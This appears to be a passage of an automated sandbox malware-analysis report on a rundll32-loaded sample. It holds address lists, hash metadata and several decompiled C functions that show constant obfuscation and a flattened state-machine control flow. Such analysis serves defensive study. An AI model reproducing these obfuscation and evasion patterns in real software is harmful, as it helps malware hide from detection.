                                                                                                                      0x006858ac
                                                                                                                      0x006858bb
                                                                                                                      0x006858c0
                                                                                                                      0x006858c5
                                                                                                                      0x006858da
                                                                                                                      0x006858db
                                                                                                                      0x006858dc
                                                                                                                      0x006858e1
                                                                                                                      0x006858e7
                                                                                                                      0x00685901
                                                                                                                      0x0068590f
                                                                                                                      0x00685912
                                                                                                                      0x00685915
                                                                                                                      0x00685915
                                                                                                                      0x006858e7
                                                                                                                      0x00685916
                                                                                                                      0x00000000
                                                                                                                      0x00685916
                                                                                                                      0x00685819
                                                                                                                      0x00685856
                                                                                                                      0x00685859
                                                                                                                      0x0068585b
                                                                                                                      0x00685860
                                                                                                                      0x00685864
                                                                                                                      0x0068586e
                                                                                                                      0x0068586b
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x0068586d
                                                                                                                      0x0068586d
                                                                                                                      0x00685872
                                                                                                                      0x00685874
                                                                                                                      0x00685878
                                                                                                                      0x00685892
                                                                                                                      0x00685892
                                                                                                                      0x00000000
                                                                                                                      0x00685892
                                                                                                                      0x0068587a
                                                                                                                      0x0068588c
                                                                                                                      0x0068588c
                                                                                                                      0x00685890
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00685890
                                                                                                                      0x00000000
                                                                                                                      0x0068587a
                                                                                                                      0x0068581d
                                                                                                                      0x00685975
                                                                                                                      0x0068597b
                                                                                                                      0x00685987
                                                                                                                      0x00685987
                                                                                                                      0x00685829
                                                                                                                      0x0068595b
                                                                                                                      0x00685961
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00685967
                                                                                                                      0x00685849
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x0068584f
                                                                                                                      0x0068584f
                                                                                                                      0x00685943
                                                                                                                      0x00685948
                                                                                                                      0x0068594d
                                                                                                                      0x00685959
                                                                                                                      0x00000000
                                                                                                                      0x00685959
                                                                                                                      0x0068594f
                                                                                                                      0x00000000

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504875945.0000000000681000.00000020.00000800.00020000.00000000.sdmp, Offset: 00680000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504869221.0000000000680000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 00000009.00000002.504894882.00000000006A3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_680000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: 1t{$9Q$;<$e}n
                                                                                                                      • API String ID: 0-2095593254
                                                                                                                      • Opcode ID: 3e729f004d8ed529ecf323f69a5bd049de09d4616ed983f039155076c9e898ed
                                                                                                                      • Instruction ID: 7189868d253b7993f477663ae0310a897bbdcc25118f985a2c2d4ee2137c1a09
                                                                                                                      • Opcode Fuzzy Hash: 3e729f004d8ed529ecf323f69a5bd049de09d4616ed983f039155076c9e898ed
                                                                                                                      • Instruction Fuzzy Hash: 19B141B1108381DFC768DF22C58595BBBF2FBC4748F508A1DF69696260D7B18A4ACF42
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 95%
                                                                                                                      			E00697DD5() {
                                                                                                                      				char _v520;
                                                                                                                      				char _v1040;
                                                                                                                      				signed int _v1044;
                                                                                                                      				signed int _v1048;
                                                                                                                      				intOrPtr _v1052;
                                                                                                                      				intOrPtr _v1056;
                                                                                                                      				unsigned int _v1060;
                                                                                                                      				signed int _v1064;
                                                                                                                      				signed int _v1068;
                                                                                                                      				signed int _v1072;
                                                                                                                      				signed int _v1076;
                                                                                                                      				signed int _v1080;
                                                                                                                      				signed int _v1084;
                                                                                                                      				signed int _v1088;
                                                                                                                      				signed int _v1092;
                                                                                                                      				signed int _v1096;
                                                                                                                      				signed int _v1100;
                                                                                                                      				signed int _v1104;
                                                                                                                      				signed int _v1108;
                                                                                                                      				signed int _v1112;
                                                                                                                      				signed int _v1116;
                                                                                                                      				signed int _v1120;
                                                                                                                      				signed int _v1124;
                                                                                                                      				signed int _v1128;
                                                                                                                      				signed int _v1132;
                                                                                                                      				signed int _v1136;
                                                                                                                      				signed int _v1140;
                                                                                                                      				signed int _v1144;
                                                                                                                      				signed int _v1148;
                                                                                                                      				signed int _v1152;
                                                                                                                      				signed int _v1156;
                                                                                                                      				intOrPtr _t236;
                                                                                                                      				void* _t241;
                                                                                                                      				short* _t244;
                                                                                                                      				void* _t247;
                                                                                                                      				void* _t250;
                                                                                                                      				intOrPtr _t256;
                                                                                                                      				intOrPtr _t272;
                                                                                                                      				signed int _t278;
                                                                                                                      				signed int _t279;
                                                                                                                      				signed int _t280;
                                                                                                                      				signed int* _t283;
                                                                                                                      
                                                                                                                      				_t283 =  &_v1156;
                                                                                                                      				_v1048 = _v1048 & 0x00000000;
                                                                                                                      				_v1044 = _v1044 & 0x00000000;
                                                                                                                      				_t250 = 0x1242b9;
                                                                                                                      				_v1056 = 0xc74a30;
                                                                                                                      				_v1052 = 0xdc93e6;
                                                                                                                      				_v1140 = 0x94ae82;
                                                                                                                      				_v1140 = _v1140 * 0x5d;
                                                                                                                      				_v1140 = _v1140 | 0xd08f5b59;
                                                                                                                      				_t278 = 0x3b;
                                                                                                                      				_v1140 = _v1140 / _t278;
                                                                                                                      				_v1140 = _v1140 ^ 0x042b78b4;
                                                                                                                      				_v1060 = 0xf2c7d8;
                                                                                                                      				_v1060 = _v1060 >> 0xe;
                                                                                                                      				_v1060 = _v1060 ^ 0x000b32e4;
                                                                                                                      				_v1084 = 0xadf7c1;
                                                                                                                      				_v1084 = _v1084 >> 7;
                                                                                                                      				_v1084 = _v1084 ^ 0x0005ae79;
                                                                                                                      				_v1068 = 0x4ca2f2;
                                                                                                                      				_v1068 = _v1068 | 0x7f3e9315;
                                                                                                                      				_v1068 = _v1068 ^ 0x7f77e091;
                                                                                                                      				_v1148 = 0xfaa01c;
                                                                                                                      				_v1148 = _v1148 | 0x0a84fcb5;
                                                                                                                      				_t279 = 0x3d;
                                                                                                                      				_v1148 = _v1148 / _t279;
                                                                                                                      				_v1148 = _v1148 + 0xffff92ee;
                                                                                                                      				_v1148 = _v1148 ^ 0x0020489e;
                                                                                                                      				_v1104 = 0xbd50a4;
                                                                                                                      				_v1104 = _v1104 | 0x802f8c80;
                                                                                                                      				_v1104 = _v1104 ^ 0xe2a4d8db;
                                                                                                                      				_v1104 = _v1104 ^ 0x621899e9;
                                                                                                                      				_v1096 = 0x4ec4a;
                                                                                                                      				_t280 = 0x27;
                                                                                                                      				_v1096 = _v1096 / _t280;
                                                                                                                      				_v1096 = _v1096 ^ 0x000ca7f0;
                                                                                                                      				_v1156 = 0x496e13;
                                                                                                                      				_v1156 = _v1156 << 0xb;
                                                                                                                      				_v1156 = _v1156 + 0xffff34c4;
                                                                                                                      				_v1156 = _v1156 ^ 0xea67072b;
                                                                                                                      				_v1156 = _v1156 ^ 0xa10c07e0;
                                                                                                                      				_v1132 = 0x5417d7;
                                                                                                                      				_v1132 = _v1132 ^ 0x2d0a29d3;
                                                                                                                      				_v1132 = _v1132 * 0x11;
                                                                                                                      				_v1132 = _v1132 ^ 0x95d68b4c;
                                                                                                                      				_v1132 = _v1132 ^ 0x969bce68;
                                                                                                                      				_v1108 = 0x3d434d;
                                                                                                                      				_t83 =  &_v1108; // 0x3d434d
                                                                                                                      				_v1108 =  *_t83 * 0x5d;
                                                                                                                      				_v1108 = _v1108 + 0xbd1d;
                                                                                                                      				_v1108 = _v1108 ^ 0x16426462;
                                                                                                                      				_v1064 = 0x905f90;
                                                                                                                      				_v1064 = _v1064 << 7;
                                                                                                                      				_v1064 = _v1064 ^ 0x482aff2b;
                                                                                                                      				_v1076 = 0xa70fe8;
                                                                                                                      				_v1076 = _v1076 ^ 0x0f6696b3;
                                                                                                                      				_v1076 = _v1076 ^ 0x0fce7292;
                                                                                                                      				_v1144 = 0x5add64;
                                                                                                                      				_v1144 = _v1144 * 0x72;
                                                                                                                      				_v1144 = _v1144 >> 2;
                                                                                                                      				_v1144 = _v1144 + 0xffffbbe0;
                                                                                                                      				_v1144 = _v1144 ^ 0x0a105df6;
                                                                                                                      				_v1112 = 0xa934e1;
                                                                                                                      				_v1112 = _v1112 + 0xffff3dc6;
                                                                                                                      				_v1112 = _v1112 ^ 0xf71e7087;
                                                                                                                      				_v1112 = _v1112 ^ 0xf7bbdd65;
                                                                                                                      				_v1152 = 0xfe7bab;
                                                                                                                      				_v1152 = _v1152 + 0xffffe121;
                                                                                                                      				_v1152 = _v1152 << 7;
                                                                                                                      				_v1152 = _v1152 + 0xffffae88;
                                                                                                                      				_v1152 = _v1152 ^ 0x7f211c18;
                                                                                                                      				_v1092 = 0x242707;
                                                                                                                      				_v1092 = _v1092 >> 6;
                                                                                                                      				_v1092 = _v1092 ^ 0x0003c6d8;
                                                                                                                      				_v1136 = 0xebac4f;
                                                                                                                      				_v1136 = _v1136 + 0x4c15;
                                                                                                                      				_v1136 = _v1136 >> 0xf;
                                                                                                                      				_v1136 = _v1136 ^ 0xdf38e0e8;
                                                                                                                      				_v1136 = _v1136 ^ 0xdf3b1dfc;
                                                                                                                      				_v1120 = 0x4eb7ab;
                                                                                                                      				_v1120 = _v1120 << 2;
                                                                                                                      				_v1120 = _v1120 + 0xffff85cc;
                                                                                                                      				_v1120 = _v1120 ^ 0x01347c50;
                                                                                                                      				_v1088 = 0xc2f923;
                                                                                                                      				_v1088 = _v1088 * 0xf;
                                                                                                                      				_v1088 = _v1088 ^ 0x0b6c1f22;
                                                                                                                      				_v1080 = 0xbf02c1;
                                                                                                                      				_v1080 = _v1080 + 0xffffcd4c;
                                                                                                                      				_v1080 = _v1080 ^ 0x00bd8b7d;
                                                                                                                      				_v1128 = 0xfef10;
                                                                                                                      				_v1128 = _v1128 + 0xfa25;
                                                                                                                      				_v1128 = _v1128 + 0xffffb342;
                                                                                                                      				_v1128 = _v1128 + 0x2fe7;
                                                                                                                      				_v1128 = _v1128 ^ 0x00107547;
                                                                                                                      				_v1116 = 0x30091d;
                                                                                                                      				_v1116 = _v1116 | 0x682f5e67;
                                                                                                                      				_v1116 = _v1116 * 0xf;
                                                                                                                      				_v1116 = _v1116 ^ 0x1bb1960a;
                                                                                                                      				_v1100 = 0xdd7fbe;
                                                                                                                      				_v1100 = _v1100 >> 0xf;
                                                                                                                      				_v1100 = _v1100 + 0xffff26d4;
                                                                                                                      				_v1100 = _v1100 ^ 0xfff0a895;
                                                                                                                      				_v1072 = 0xd8d782;
                                                                                                                      				_v1072 = _v1072 + 0xffff857d;
                                                                                                                      				_v1072 = _v1072 ^ 0x00daabd2;
                                                                                                                      				_v1124 = 0x615b7c;
                                                                                                                      				_v1124 = _v1124 >> 0x10;
                                                                                                                      				_v1124 = _v1124 * 0x3d;
                                                                                                                      				_v1124 = _v1124 ^ 0x000147a1;
                                                                                                                      				L1:
                                                                                                                      				while(_t250 != 0x1242b9) {
                                                                                                                      					if(_t250 == 0x56337fc) {
                                                                                                                      						E00696C49(_v1144, _v1112, _v1152, _v1092,  &_v520);
                                                                                                                      						_push(_v1088);
                                                                                                                      						_push( &_v520);
                                                                                                                      						_push(_v1120);
                                                                                                                      						E006A13AD(_v1136,  &_v1040, __eflags);
                                                                                                                      						_t283 =  &(_t283[6]);
                                                                                                                      						_t250 = 0x8d6676f;
                                                                                                                      						continue;
                                                                                                                      					}
                                                                                                                      					if(_t250 == 0x5f94146) {
                                                                                                                      						_push(_v1148);
                                                                                                                      						_push(_v1068);
                                                                                                                      						_t241 = E0069DCF7(_v1084, 0x681000, __eflags);
                                                                                                                      						_t256 =  *0x6a3e10; // 0x0
                                                                                                                      						_t272 =  *0x6a3e10; // 0x0
                                                                                                                      						E006847CE(_t272 + 0x23c, _v1104, _t256 + 0x1c, _v1096, _v1156, _t241, _t256 + 0x1c, _v1132, _v1108);
                                                                                                                      						E0068A8B0(_v1064, _t241, _v1076);
                                                                                                                      						_t283 =  &(_t283[9]);
                                                                                                                      						_t250 = 0x56337fc;
                                                                                                                      						continue;
                                                                                                                      					}
                                                                                                                      					if(_t250 == 0x8d6676f) {
                                                                                                                      						_t244 = E0068B6CF( &_v1040, _v1080, _v1128, _v1116);
                                                                                                                      						__eflags = 0;
                                                                                                                      						 *_t244 = 0;
                                                                                                                      						return E0068B1C6( &_v1040, _v1100, _v1072, _v1124);
                                                                                                                      					}
                                                                                                                      					if(_t250 == 0xbcbde3e) {
                                                                                                                      						_t247 = E0069473C();
                                                                                                                      						L8:
                                                                                                                      						_t250 = 0x5f94146;
                                                                                                                      						continue;
                                                                                                                      					}
                                                                                                                      					if(_t250 != 0xf4317dc) {
                                                                                                                      						L15:
                                                                                                                      						__eflags = _t250 - 0xfb0317f;
                                                                                                                      						if(__eflags != 0) {
                                                                                                                      							continue;
                                                                                                                      						}
                                                                                                                      						return _t247;
                                                                                                                      					}
                                                                                                                      					_t247 = E00683E3F();
                                                                                                                      					goto L8;
                                                                                                                      				}
                                                                                                                      				_t236 =  *0x6a3e10; // 0x0
                                                                                                                      				__eflags =  *((intOrPtr*)(_t236 + 0x450));
                                                                                                                      				if(__eflags == 0) {
                                                                                                                      					_t250 = 0xf4317dc;
                                                                                                                      					goto L15;
                                                                                                                      				}
                                                                                                                      				_t250 = 0xbcbde3e;
                                                                                                                      				goto L1;
                                                                                                                      			}
                                                                                                                      0x00000000
                                                                                                                      0x0069823f
                                                                                                                      0x00698150
                                                                                                                      0x00000000
                                                                                                                      0x00698150
                                                                                                                      0x00698222
                                                                                                                      0x00698227
                                                                                                                      0x0069822e
                                                                                                                      0x00698237
                                                                                                                      0x00000000
                                                                                                                      0x00698237
                                                                                                                      0x00698230
                                                                                                                      0x00000000

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504875945.0000000000681000.00000020.00000800.00020000.00000000.sdmp, Offset: 00680000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504869221.0000000000680000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 00000009.00000002.504894882.00000000006A3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_680000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: MC=$g^/h$|[a$/
                                                                                                                      • API String ID: 0-1545830693
                                                                                                                      • Opcode ID: b234ee5da1c8b38fee3ec954610a30d80f700f425b499e4d0a08c02b86015b35
                                                                                                                      • Instruction ID: cd96da83b5c7c0bc5e2abe99fa3b699bb78e85dc29955a0350d78515446a26dc
                                                                                                                      • Opcode Fuzzy Hash: b234ee5da1c8b38fee3ec954610a30d80f700f425b499e4d0a08c02b86015b35
                                                                                                                      • Instruction Fuzzy Hash: C8C110B11083818FC7A8DF25C48A41BFBE2FBC1758F508A1DF19296260D7B58A0ACF46
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 96%
                                                                                                                      			E0069A2E8(intOrPtr __ecx, intOrPtr* __edx) {
                                                                                                                      				intOrPtr _v4;
                                                                                                                      				intOrPtr* _v8;
                                                                                                                      				intOrPtr _v12;
                                                                                                                      				char _v16;
                                                                                                                      				signed int _v20;
                                                                                                                      				intOrPtr _v24;
                                                                                                                      				signed int _v28;
                                                                                                                      				signed int _v32;
                                                                                                                      				signed int _v36;
                                                                                                                      				signed int _v40;
                                                                                                                      				signed int _v44;
                                                                                                                      				intOrPtr _v48;
                                                                                                                      				signed int _v52;
                                                                                                                      				signed int _v56;
                                                                                                                      				signed int _v60;
                                                                                                                      				signed int _v64;
                                                                                                                      				signed int _v68;
                                                                                                                      				signed int _v72;
                                                                                                                      				signed int _v76;
                                                                                                                      				signed int _v80;
                                                                                                                      				signed int _v84;
                                                                                                                      				signed int _v88;
                                                                                                                      				signed int _v92;
                                                                                                                      				intOrPtr _t184;
                                                                                                                      				intOrPtr* _t189;
                                                                                                                      				intOrPtr _t193;
                                                                                                                      				intOrPtr _t196;
                                                                                                                      				intOrPtr _t197;
                                                                                                                      				intOrPtr _t198;
                                                                                                                      				intOrPtr _t204;
                                                                                                                      				intOrPtr _t205;
                                                                                                                      				signed int _t223;
                                                                                                                      				signed int _t224;
                                                                                                                      				signed int _t225;
                                                                                                                      				intOrPtr _t226;
                                                                                                                      				void* _t228;
                                                                                                                      				signed int _t229;
                                                                                                                      				intOrPtr _t230;
                                                                                                                      				signed int* _t231;
                                                                                                                      
                                                                                                                      				_t198 = __ecx;
                                                                                                                      				_t231 =  &_v92;
                                                                                                                      				_v8 = __edx;
                                                                                                                      				_v24 = __ecx;
                                                                                                                      				_v28 = 0x24c7b9;
                                                                                                                      				_v28 = _v28 << 9;
                                                                                                                      				_v28 = _v28 ^ 0x498f7200;
                                                                                                                      				_v76 = 0x5897f7;
                                                                                                                      				_v76 = _v76 + 0xffffedf4;
                                                                                                                      				_v76 = _v76 << 0xf;
                                                                                                                      				_v76 = _v76 + 0x73e5;
                                                                                                                      				_v76 = _v76 ^ 0x42f7f56f;
                                                                                                                      				_v52 = 0x46ab19;
                                                                                                                      				_v52 = _v52 << 0xd;
                                                                                                                      				_t228 = 0xe611c04;
                                                                                                                      				_v20 = _v20 & 0x00000000;
                                                                                                                      				_t223 = 0x66;
                                                                                                                      				_v52 = _v52 / _t223;
                                                                                                                      				_v52 = _v52 ^ 0x0211beab;
                                                                                                                      				_v80 = 0x97c948;
                                                                                                                      				_v80 = _v80 ^ 0xfb972484;
                                                                                                                      				_v80 = _v80 << 2;
                                                                                                                      				_v80 = _v80 << 0xf;
                                                                                                                      				_v80 = _v80 ^ 0xdb950905;
                                                                                                                      				_v44 = 0x96980f;
                                                                                                                      				_v44 = _v44 ^ 0xfeb8bb56;
                                                                                                                      				_v44 = _v44 ^ 0xfe2f3013;
                                                                                                                      				_v64 = 0x454cfa;
                                                                                                                      				_v64 = _v64 ^ 0x45fe36ac;
                                                                                                                      				_t224 = 0x43;
                                                                                                                      				_v64 = _v64 / _t224;
                                                                                                                      				_v64 = _v64 ^ 0x010b84d0;
                                                                                                                      				_v68 = 0xb73a82;
                                                                                                                      				_v68 = _v68 | 0xd419dac3;
                                                                                                                      				_t225 = 0x23;
                                                                                                                      				_v68 = _v68 / _t225;
                                                                                                                      				_v68 = _v68 ^ 0x061f1f3c;
                                                                                                                      				_v60 = 0xe80863;
                                                                                                                      				_v60 = _v60 * 7;
                                                                                                                      				_v60 = _v60 ^ 0x88fb80a0;
                                                                                                                      				_v60 = _v60 ^ 0x8ea007f2;
                                                                                                                      				_v40 = 0x80f530;
                                                                                                                      				_v40 = _v40 ^ 0xcef24483;
                                                                                                                      				_v40 = _v40 ^ 0xce7935e2;
                                                                                                                      				_v92 = 0x233377;
                                                                                                                      				_v92 = _v92 ^ 0x61e14959;
                                                                                                                      				_v92 = _v92 + 0xffffa5e4;
                                                                                                                      				_v92 = _v92 + 0xf94b;
                                                                                                                      				_v92 = _v92 ^ 0x61c7ad44;
                                                                                                                      				_v88 = 0xbad9cc;
                                                                                                                      				_v88 = _v88 | 0x5a2a09a8;
                                                                                                                      				_v88 = _v88 * 0x2f;
                                                                                                                      				_v88 = _v88 | 0xecc1c683;
                                                                                                                      				_v88 = _v88 ^ 0xecc3849f;
                                                                                                                      				_v56 = 0xb0d301;
                                                                                                                      				_v56 = _v56 + 0xa0bb;
                                                                                                                      				_v56 = _v56 << 0xf;
                                                                                                                      				_v56 = _v56 ^ 0xb9db0742;
                                                                                                                      				_v36 = 0xab48cf;
                                                                                                                      				_v36 = _v36 * 0x24;
                                                                                                                      				_v36 = _v36 ^ 0x1811952a;
                                                                                                                      				_v84 = 0x104632;
                                                                                                                      				_v84 = _v84 + 0x4a21;
                                                                                                                      				_v84 = _v84 ^ 0x8dbd106a;
                                                                                                                      				_v84 = _v84 + 0xfe54;
                                                                                                                      				_v84 = _v84 ^ 0x8daed025;
                                                                                                                      				_t226 = _v4;
                                                                                                                      				_t197 = _v8;
                                                                                                                      				_t230 = _v8;
                                                                                                                      				_v72 = 0x1611ea;
                                                                                                                      				_v72 = _v72 ^ 0xe055e86d;
                                                                                                                      				_v72 = _v72 >> 0xd;
                                                                                                                      				_v72 = _v72 >> 5;
                                                                                                                      				_v72 = _v72 ^ 0x0003993e;
                                                                                                                      				_v32 = 0x799484;
                                                                                                                      				_v32 = _v32 ^ 0xb4488d59;
                                                                                                                      				_v32 = _v32 ^ 0xb439947f;
                                                                                                                      				L1:
                                                                                                                      				while(1) {
                                                                                                                      					do {
                                                                                                                      						while(_t228 != 0x5161e0c) {
                                                                                                                      							if(_t228 == 0xb95f952) {
                                                                                                                      								_t229 = E0069C032( &_v16, _t198, _t184, _t230, _v44, _v64, _v68);
                                                                                                                      								_t231 =  &(_t231[5]);
                                                                                                                      								_v20 = _t229;
                                                                                                                      								if(_t229 == 0) {
                                                                                                                      									L18:
                                                                                                                      									E00698519(_v72, _v32, _t197);
                                                                                                                      								} else {
                                                                                                                      									_t204 = _v16;
                                                                                                                      									if(_t204 == 0) {
                                                                                                                      										L17:
                                                                                                                      										if(_t229 != 0) {
                                                                                                                      											_t189 = _v8;
                                                                                                                      											 *_t189 = _t197;
                                                                                                                      											 *((intOrPtr*)(_t189 + 4)) = _t226 - _t230;
                                                                                                                      										} else {
                                                                                                                      											goto L18;
                                                                                                                      										}
                                                                                                                      									} else {
                                                                                                                      										_v48 = _v48 + _t204;
                                                                                                                      										_t230 = _t230 - _t204;
                                                                                                                      										if(_t230 != 0) {
                                                                                                                      											L10:
                                                                                                                      											_t184 = _v48;
                                                                                                                      											L11:
                                                                                                                      											_t198 = _v24;
                                                                                                                      											_t228 = 0xb95f952;
                                                                                                                      											continue;
                                                                                                                      										} else {
                                                                                                                      											_t205 = _t226 + _t226;
                                                                                                                      											_push(_t205);
                                                                                                                      											_push(_t205);
                                                                                                                      											_v12 = _t205;
                                                                                                                      											_t193 = E00687FF2(_t205);
                                                                                                                      											_v48 = _t193;
                                                                                                                      											if(_t193 == 0) {
                                                                                                                      												goto L17;
                                                                                                                      											} else {
                                                                                                                      												E0068ED7E(_v88, _t193, _v56, _t197, _t226);
                                                                                                                      												E00698519(_v36, _v84, _t197);
                                                                                                                      												_t197 = _v48;
                                                                                                                      												_t230 = _t226;
                                                                                                                      												_t231 =  &(_t231[4]);
                                                                                                                      												_t196 = _t197 + _t226;
                                                                                                                      												_t226 = _v12;
                                                                                                                      												_v48 = _t196;
                                                                                                                      												if(_t230 == 0) {
                                                                                                                      													goto L17;
                                                                                                                      												} else {
                                                                                                                      													goto L10;
                                                                                                                      												}
                                                                                                                      											}
                                                                                                                      										}
                                                                                                                      									}
                                                                                                                      								}
                                                                                                                      							} else {
                                                                                                                      								if(_t228 != 0xe611c04) {
                                                                                                                      									goto L15;
                                                                                                                      								} else {
                                                                                                                      									_t228 = 0x5161e0c;
                                                                                                                      									continue;
                                                                                                                      								}
                                                                                                                      							}
                                                                                                                      							L20:
                                                                                                                      							return _t229;
                                                                                                                      						}
                                                                                                                      						_t226 = 0x10000;
                                                                                                                      						_push(_t198);
                                                                                                                      						_push(_t198);
                                                                                                                      						_t184 = E00687FF2(0x10000);
                                                                                                                      						_t197 = _t184;
                                                                                                                      						if(_t197 == 0) {
                                                                                                                      							_t198 = _v24;
                                                                                                                      							_t228 = 0xa3056fc;
                                                                                                                      							goto L15;
                                                                                                                      						} else {
                                                                                                                      							_v48 = _t184;
                                                                                                                      							_t230 = 0x10000;
                                                                                                                      							goto L11;
                                                                                                                      						}
                                                                                                                      						goto L20;
                                                                                                                      						L15:
                                                                                                                      						_t184 = _v48;
                                                                                                                      					} while (_t228 != 0xa3056fc);
                                                                                                                      					_t229 = _v20;
                                                                                                                      					goto L17;
                                                                                                                      				}
                                                                                                                      			}











































                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504875945.0000000000681000.00000020.00000800.00020000.00000000.sdmp, Offset: 00680000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504869221.0000000000680000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 00000009.00000002.504894882.00000000006A3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_680000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: !J$YIa$mU$s
                                                                                                                      • API String ID: 0-3335770892
                                                                                                                      • Opcode ID: a2c96b5523714fc353019ef791256b388c8b4530006014acc88a687be62f7107
                                                                                                                      • Instruction ID: fee6806227ab921bbf9c194e211ab6c702f68c66b6622815bffad170ba5e1841
                                                                                                                      • Opcode Fuzzy Hash: a2c96b5523714fc353019ef791256b388c8b4530006014acc88a687be62f7107
                                                                                                                      • Instruction Fuzzy Hash: 5E913F715093409BC394DF69C18581BFBF6BBC4758F504A1EF99597220D3B4DA09CB87
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 96%
                                                                                                                      			E00684EE3(intOrPtr _a4, intOrPtr _a8) {
                                                                                                                      				signed int _v8;
                                                                                                                      				signed int _v12;
                                                                                                                      				signed int _v16;
                                                                                                                      				signed int _v20;
                                                                                                                      				signed int _v24;
                                                                                                                      				signed int _v28;
                                                                                                                      				signed int _v32;
                                                                                                                      				signed int _v36;
                                                                                                                      				signed int _v40;
                                                                                                                      				signed int _v44;
                                                                                                                      				signed int _v48;
                                                                                                                      				signed int _v52;
                                                                                                                      				signed int _v56;
                                                                                                                      				signed int _v60;
                                                                                                                      				signed int _v64;
                                                                                                                      				signed int _v68;
                                                                                                                      				signed int _v72;
                                                                                                                      				signed int _v76;
                                                                                                                      				signed int _v80;
                                                                                                                      				signed int _v84;
                                                                                                                      				intOrPtr _v88;
                                                                                                                      				char _v608;
                                                                                                                      				void* _t203;
                                                                                                                      				void* _t204;
                                                                                                                      				void* _t207;
                                                                                                                      				signed int _t212;
                                                                                                                      				signed int _t213;
                                                                                                                      				signed int _t214;
                                                                                                                      				signed int _t215;
                                                                                                                      				intOrPtr _t216;
                                                                                                                      				void* _t221;
                                                                                                                      
                                                                                                                      				_v84 = _v84 & 0x00000000;
                                                                                                                      				_v88 = 0xf9097a;
                                                                                                                      				_v32 = 0xbcbe1d;
                                                                                                                      				_v32 = _v32 << 9;
                                                                                                                      				_v32 = _v32 << 9;
                                                                                                                      				_v32 = _v32 << 0xb;
                                                                                                                      				_v32 = _v32 ^ 0xa0062323;
                                                                                                                      				_v16 = 0x782140;
                                                                                                                      				_v16 = _v16 + 0xfffffe34;
                                                                                                                      				_v16 = _v16 + 0xfffffe18;
                                                                                                                      				_v16 = _v16 << 0xa;
                                                                                                                      				_v16 = _v16 ^ 0xe0701d9a;
                                                                                                                      				_v40 = 0x7af846;
                                                                                                                      				_v40 = _v40 + 0xffff28b3;
                                                                                                                      				_v40 = _v40 << 0xd;
                                                                                                                      				_v40 = _v40 + 0xffffd351;
                                                                                                                      				_v40 = _v40 ^ 0x441384bc;
                                                                                                                      				_v68 = 0xebfd4;
                                                                                                                      				_v68 = _v68 + 0xffff2b98;
                                                                                                                      				_t212 = 0x4b;
                                                                                                                      				_v68 = _v68 / _t212;
                                                                                                                      				_v68 = _v68 ^ 0x000f3184;
                                                                                                                      				_v48 = 0x77c678;
                                                                                                                      				_t213 = 0x72;
                                                                                                                      				_v48 = _v48 * 0x4d;
                                                                                                                      				_v48 = _v48 + 0x6b8c;
                                                                                                                      				_v48 = _v48 ^ 0x240efbe4;
                                                                                                                      				_v24 = 0xae1064;
                                                                                                                      				_v24 = _v24 / _t213;
                                                                                                                      				_v24 = _v24 << 7;
                                                                                                                      				_v24 = _v24 ^ 0x1be7fa9d;
                                                                                                                      				_v24 = _v24 ^ 0x1b226397;
                                                                                                                      				_v72 = 0x44bde7;
                                                                                                                      				_v72 = _v72 | 0x5f63ee23;
                                                                                                                      				_v72 = _v72 ^ 0x5f6de837;
                                                                                                                      				_v56 = 0x5a94a4;
                                                                                                                      				_v56 = _v56 >> 9;
                                                                                                                      				_t214 = 0xc;
                                                                                                                      				_v56 = _v56 * 0x2a;
                                                                                                                      				_v56 = _v56 ^ 0x0003dc1b;
                                                                                                                      				_v8 = 0x2a4d30;
                                                                                                                      				_v8 = _v8 + 0xff2b;
                                                                                                                      				_v8 = _v8 | 0x9a82811b;
                                                                                                                      				_v8 = _v8 << 0xc;
                                                                                                                      				_v8 = _v8 ^ 0xbcdbc31f;
                                                                                                                      				_v64 = 0xa41a91;
                                                                                                                      				_v64 = _v64 | 0x62aa1889;
                                                                                                                      				_v64 = _v64 << 0xd;
                                                                                                                      				_v64 = _v64 ^ 0xc357e7aa;
                                                                                                                      				_v36 = 0x90fe9;
                                                                                                                      				_v36 = _v36 >> 0xa;
                                                                                                                      				_v36 = _v36 | 0x57d87c49;
                                                                                                                      				_v36 = _v36 / _t214;
                                                                                                                      				_v36 = _v36 ^ 0x0755636a;
                                                                                                                      				_v28 = 0x5fda7e;
                                                                                                                      				_v28 = _v28 + 0xffff2d0f;
                                                                                                                      				_v28 = _v28 << 0xa;
                                                                                                                      				_v28 = _v28 + 0xdffb;
                                                                                                                      				_v28 = _v28 ^ 0x7c1a8a5e;
                                                                                                                      				_v20 = 0xaf632f;
                                                                                                                      				_v20 = _v20 >> 8;
